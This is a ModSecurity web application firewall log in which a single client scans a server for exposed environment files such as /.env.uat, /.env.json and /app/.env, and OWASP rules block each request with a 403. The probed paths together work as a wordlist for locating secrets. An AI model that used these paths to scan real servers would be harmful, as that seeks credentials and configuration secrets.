[Mon May 11 18:03:04.192870 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9uEWKUxpmnkK7zHyheAAAAQQ"]
[Mon May 11 18:03:04.362343 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.uat"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env.uat"] [unique_id "agH9uEWKUxpmnkK7zHyheQAAAQQ"]
[Mon May 11 18:03:04.362562 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env.uat"] [unique_id "agH9uEWKUxpmnkK7zHyheQAAAQQ"]
[Mon May 11 18:03:04.362859 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9uEWKUxpmnkK7zHyheQAAAQQ"]
[Mon May 11 18:03:04.523906 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dist"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env.dist"] [unique_id "agH9uEWKUxpmnkK7zHyhewAAAQQ"]
[Mon May 11 18:03:04.524110 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env.dist"] [unique_id "agH9uEWKUxpmnkK7zHyhewAAAQQ"]
[Mon May 11 18:03:04.524457 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9uEWKUxpmnkK7zHyhewAAAQQ"]
[Mon May 11 18:03:04.886828 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.swp"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env.swp"] [unique_id "agH9uEWKUxpmnkK7zHyhfAAAAQQ"]
[Mon May 11 18:03:04.887044 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env.swp"] [unique_id "agH9uEWKUxpmnkK7zHyhfAAAAQQ"]
[Mon May 11 18:03:04.887330 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9uEWKUxpmnkK7zHyhfAAAAQQ"]
[Mon May 11 18:03:05.043175 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env~"] [unique_id "agH9uUWKUxpmnkK7zHyhfgAAAQQ"]
[Mon May 11 18:03:05.043400 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env~"] [unique_id "agH9uUWKUxpmnkK7zHyhfgAAAQQ"]
[Mon May 11 18:03:05.043704 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9uUWKUxpmnkK7zHyhfgAAAQQ"]
[Mon May 11 18:03:05.205641 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env1"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env1"] [unique_id "agH9uUWKUxpmnkK7zHyhfwAAAQQ"]
[Mon May 11 18:03:05.205866 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env1"] [unique_id "agH9uUWKUxpmnkK7zHyhfwAAAQQ"]
[Mon May 11 18:03:05.206174 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9uUWKUxpmnkK7zHyhfwAAAQQ"]
[Mon May 11 18:03:05.365395 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env2"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env2"] [unique_id "agH9uUWKUxpmnkK7zHyhgAAAAQQ"]
[Mon May 11 18:03:05.365619 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env2"] [unique_id "agH9uUWKUxpmnkK7zHyhgAAAAQQ"]
[Mon May 11 18:03:05.365941 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9uUWKUxpmnkK7zHyhgAAAAQQ"]
[Mon May 11 18:03:05.518655 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env_copy"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env_copy"] [unique_id "agH9uUWKUxpmnkK7zHyhgQAAAQQ"]
[Mon May 11 18:03:05.518879 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env_copy"] [unique_id "agH9uUWKUxpmnkK7zHyhgQAAAQQ"]
[Mon May 11 18:03:05.519190 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9uUWKUxpmnkK7zHyhgQAAAQQ"]
[Mon May 11 18:03:05.681602 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env.txt"] [unique_id "agH9uUWKUxpmnkK7zHyhggAAAQQ"]
[Mon May 11 18:03:05.681829 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env.txt"] [unique_id "agH9uUWKUxpmnkK7zHyhggAAAQQ"]
[Mon May 11 18:03:05.682142 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9uUWKUxpmnkK7zHyhggAAAQQ"]
[Mon May 11 18:03:05.858834 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.json"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env.json"] [unique_id "agH9uUWKUxpmnkK7zHyhgwAAAQQ"]
[Mon May 11 18:03:05.859180 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env.json"] [unique_id "agH9uUWKUxpmnkK7zHyhgwAAAQQ"]
[Mon May 11 18:03:05.860996 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9uUWKUxpmnkK7zHyhgwAAAQQ"]
[Mon May 11 18:03:06.017759 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.yaml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env.yaml"] [unique_id "agH9ukWKUxpmnkK7zHyhhQAAAQQ"]
[Mon May 11 18:03:06.017987 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env.yaml"] [unique_id "agH9ukWKUxpmnkK7zHyhhQAAAQQ"]
[Mon May 11 18:03:06.018312 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9ukWKUxpmnkK7zHyhhQAAAQQ"]
[Mon May 11 18:03:06.199865 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env.yml"] [unique_id "agH9ukWKUxpmnkK7zHyhhgAAAQQ"]
[Mon May 11 18:03:06.200103 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env.yml"] [unique_id "agH9ukWKUxpmnkK7zHyhhgAAAQQ"]
[Mon May 11 18:03:06.200437 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9ukWKUxpmnkK7zHyhhgAAAQQ"]
[Mon May 11 18:03:06.400584 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/app/.env"] [unique_id "agH9ukWKUxpmnkK7zHyhhwAAAQQ"]
[Mon May 11 18:03:06.400841 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/app/.env"] [unique_id "agH9ukWKUxpmnkK7zHyhhwAAAQQ"]
[Mon May 11 18:03:06.401123 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9ukWKUxpmnkK7zHyhhwAAAQQ"]
[Mon May 11 18:03:06.591943 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /apps/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/apps/.env"] [unique_id "agH9ukWKUxpmnkK7zHyhigAAAQQ"]
[Mon May 11 18:03:06.592178 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/apps/.env"] [unique_id "agH9ukWKUxpmnkK7zHyhigAAAQQ"]
[Mon May 11 18:03:06.592474 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9ukWKUxpmnkK7zHyhigAAAQQ"]
